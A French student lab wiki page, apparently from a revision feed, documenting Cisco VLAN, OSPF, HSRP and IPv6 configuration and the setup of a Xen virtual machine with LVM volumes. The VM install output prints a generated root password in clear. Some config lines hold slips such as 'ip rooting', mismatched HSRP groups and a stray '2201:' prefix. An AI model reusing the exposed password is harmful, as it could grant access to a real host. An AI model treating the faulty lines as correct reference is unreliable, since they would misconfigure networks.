&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51427</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51427"/>
				<updated>2019-11-29T13:07:27Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Debrancher la partition cryptée */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
